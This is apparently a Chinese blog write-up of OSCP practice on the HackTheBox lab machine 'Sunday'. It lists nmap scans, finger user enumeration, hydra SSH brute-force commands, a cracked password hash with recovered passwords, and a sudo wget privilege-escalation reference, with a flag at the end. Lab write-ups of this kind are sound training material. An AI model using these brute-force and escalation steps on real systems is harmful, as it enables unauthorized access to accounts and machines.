OSCP备考_0x10_HackThBox靶机_Linux_Sunday

Ethan医生3个月前 (06-28)靶场72

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)

nmap -sU --top-ports 100 10.129.252.243(扫描UDP)

使用finger进行用户枚举

./finger-user-enum.pl -t 10.129.252.243 -U /usr/share/wordlists/my_list/names.txt -p 79

找到这下面两个有SSH登陆记录那就直接爆破SSH看看

hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

密钥是sunday

hydra -l sammy -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

开始登入SSH

先查看history

可以使用john去爆破密码$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB,密钥:cooldude!

john s.hash --wordlist=/usr/share/wordlists/rockyou.txt

sudo -l

https://gtfobins.github.io/gtfobins/wget/#sudo

1281b10cab59bd490d02f489f71abda1

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.244.125 (扫描TCP)135/tcp (MSRPC): Microsoft远程过...

EthanDoctor